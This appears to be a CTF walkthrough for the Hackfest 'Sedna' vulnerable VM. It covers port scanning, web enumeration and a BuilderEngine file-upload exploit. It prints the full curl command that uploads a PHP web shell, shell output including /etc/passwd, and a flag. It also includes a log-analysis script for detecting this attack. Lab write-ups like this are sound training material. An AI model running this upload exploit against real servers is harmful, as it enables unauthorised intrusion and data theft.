
Sedna CTF Walkthrough - D3M0GORG0N

a guest, Apr 29th, 2017
=============================
Walkthrough by D3M0GORG0N @HF
=============================


Welcome to Sedna

This is a vulnerable machine I created for the Hackfest 2016 CTF http://hackfest.ca/

Difficulty : Medium

Tips:

There are multiple ways to root this box; if it should work but doesn't, try to
gather more info about why it's not working.

Goals: This machine is intended to be doable by someone who has some experience
doing machines on VulnHub

There are 4 flags on this machine:
- One for a shell
- One for root access
- Two for doing post exploitation

=================================================================================

Target IP: 192.168.56.101

==================================================================================
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE RESP-CODES STLS CAPA TOP PIPELINING UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          54863/udp  status
|_  100024  1          57224/tcp  status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE more LITERAL+ have LOGIN-REFERRALS LOGINDISABLEDA0001 Pre-login ID capabilities listed OK SASL-IR ENABLE IMAP4rev1 STARTTLS post-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE AUTH=PLAINA0001 IMAP4rev1 more have LOGIN-REFERRALS ID capabilities listed Pre-login SASL-IR ENABLE OK LITERAL+ post-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE RESP-CODES USER CAPA TOP PIPELINING UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
57224/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:DD:47:80 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m56s, deviation: 0s, median: 59m56s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-27T17:11:37-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
===================================================================================

Open Services:

22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3    Dovecot pop3d
57224/tcp open  status      1 (RPC #100024)

=================================================================================

Broken image link, also another 'Hackers' reference.
Nothing hidden in index.jpeg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, little-endian offset of first image directory: 8

==================================================================================

http://192.168.56.101/wordpress/ wasn't found. Not running WordPress?

Definitely doesn't seem to be running WordPress, see uniscan.txt for full report.

| Directory check:
| [+] CODE: 200 URL: http://192.168.56.101/blocks/
| [+] CODE: 200 URL: http://192.168.56.101/files/
| [+] CODE: 200 URL: http://192.168.56.101/modules/
| [+] CODE: 200 URL: http://192.168.56.101/system/
| [+] CODE: 200 URL: http://192.168.56.101/themes/

| File check:
| [+] CODE: 200 URL: http://192.168.56.101/index.html
| [+] CODE: 200 URL: http://192.168.56.101/license.txt
| [+] CODE: 200 URL: http://192.168.56.101/robots.txt

================================================================================

An interesting subdir: /files/users/
Lots of resources in /blocks/, look further later on.
Something called Admin.php in /modules/module_system/controllers/.
Access is forbidden in /system/

http://192.168.56.101/index.html looks to be the start of the challenge.

SSH doesn't give anything away: 'root@192.168.56.101's password: '

=================================================================================

http://192.168.56.101:8080/ reveals an Apache Tomcat service. Looks like it's
running defaults. Potential for exploitation?

Apache Tomcat/7.0.52 (Ubuntu)

http://www.cvedetails.com/cve/CVE-2016-6816/ <-- XSS flaw in this version.

=================================================================================

http://192.168.56.101:8080/docs/manager-howto.html#Configuring_Manager_Application_Access

^ Docs on RCE.

Example: http://{host}:{port}/manager/text/{command}?{parameters}

Tomcat users are defined in the file $TOMCAT_HOME/conf/tomcat-users.xml;
by default there is NO user, which means no one can access the Tomcat manager page.

========================================================================================

Tomcat requires a password from a valid user, no default creds available.
Vulnerable SMB client?

========================================================================================

Long time since I've had a pop at this, speaking of which:

┌─[✗]─[root@parrot]─[/home/user/Desktop/CTF/Sedna]
└──╼ #telnet 192.168.56.101 110
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.


Seems like Dovecot is a possible attack vector.

Attempted an overflow:

ERR Input buffer full, aborting

Either a countermeasure or a legitimate error.

=======================================================
Taking a moment to look back over files I already have.
=======================================================

http://192.168.56.101/license.txt

The MIT License (MIT)

Copyright (c) 2012 - 2015 BuilderEngine / Radian Enterprise Systems Limited.

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.

^ BuilderEngine, could be useful?

=============================================================================

http://192.168.56.101/builderengine/

And this, is why you don't rely on one directory bruter... -_-

==========================================================================

https://www.exploit-db.com/exploits/40390/

Welp, file upload vuln from 2016...

So there's an uploader plugin located in /themes/dashboard/assets/plugins/jquery-file-upload

All I have to do is send a POST request to the plugin and it should let me through?

Created pwn.php with no password.

Full command was:

curl --proxy http://127.0.0.1:8080 --form "files[]=@pwn.php" http://192.168.56.101/themes/dashboard/assets/plugins/jquery-file-upload/server/php/

==========================================================================

It worked! :D

http://192.168.56.101/files/pwn.php

Shell is online and functional.
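From the defender's side, the two requests above (a POST to the jquery-file-upload server/php/ handler, then a GET of the uploaded .php under /files/) are the trace this upload flaw leaves in the web server log. The following Python script is an added example, not part of the original walkthrough: it correlates Apache access-log lines per client and flags that upload-then-execute sequence; the sample log lines are constructed to mirror the requests in this writeup.

```python
import re

# Apache combined log format; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# BuilderEngine upload handler path from the writeup, and the directory
# from which uploaded files are served back.
UPLOAD_ENDPOINT = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
SERVED_DIR = "/files/"

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec

def find_upload_chains(lines):
    """Return (ip, path) pairs where a client POSTed to the upload handler
    and later fetched a .php file from the served directory (upload then
    execute). Lines are assumed to be in chronological order."""
    posted = set()   # client IPs that have hit the upload handler
    hits = []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT and rec["status"] == 200:
            posted.add(rec["ip"])
        elif (rec["ip"] in posted and rec["path"].startswith(SERVED_DIR)
              and rec["path"].lower().endswith(".php") and rec["status"] == 200):
            hits.append((rec["ip"], rec["path"]))
    return hits

# Constructed sample log lines modelled on the requests made in the walkthrough.
SAMPLE_LOG = [
    '192.168.56.1 - - [27/Mar/2017:17:10:01 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.52.1"',
    '192.168.56.1 - - [27/Mar/2017:17:10:05 -0400] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 96 "-" "curl/7.52.1"',
    '192.168.56.1 - - [27/Mar/2017:17:10:09 -0400] "GET /files/pwn.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '192.168.56.50 - - [27/Mar/2017:17:11:00 -0400] "GET /files/users/ HTTP/1.1" 200 230 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path in find_upload_chains(SAMPLE_LOG):
        print(f"upload-then-execute chain from {ip}: {path}")
```

The same correlation can be used as the basis for a hardening check: uploads landing under a web-served directory with an executable extension should never return 200.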

=========================================================================

/var/www/html/files/>id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

In as 'www-data' again, time to do exfil and priv-esc.

==============================================================================

So the first flag is down, now I need root access, however I can access /root/ already.

/var/www/html/>more codeception.yml
::::::::::::::
codeception.yml
::::::::::::::
paths:
    tests: tests
    log: tests/_log
    data: tests/_data
    helpers: tests/_helpers
settings:
    bootstrap: _bootstrap.php
    suite_class: \PHPUnit_Framework_TestSuite
    colors: false
    memory_limit: 1024M
    log: true
modules:
    config:
        Db:
            dsn: ''
            user: ''
            password: ''
            dump: tests/_data/dump.sql


/var/www/>cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289


/etc/>cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:108::/var/run/dbus:/bin/false
bind:x:104:115::/var/cache/bind:/bin/false
postfix:x:105:116::/var/spool/postfix:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false
dovecot:x:107:118:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:108:119:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:109:120::/var/lib/landscape:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
avahi:x:112:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:124:colord colour management daemon,,,:/var/lib/colord:/bin/false
libvirt-qemu:x:114:107:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:115:125:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
statd:x:117:65534::/var/lib/nfs:/bin/false


No password on the SQL database:  `password` varchar(60) DEFAULT NULL,

========================================================================================

crackmeforpoints:x:1000:1000::/home/crackmeforpoints:

^ This looks interesting...

I might try using Python to escalate privileges, might not work...

Yeah, didn't work as planned. I need nano to do what I wanted. :/

Either way, I'm calling this a victory, the system has been breached and I can access /root/

========================================================================================
